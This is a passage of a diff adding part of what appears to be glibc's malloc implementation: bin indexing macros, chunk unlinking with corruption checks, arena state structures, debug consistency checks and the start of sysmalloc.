+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given it's sole purpose is to reduce number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
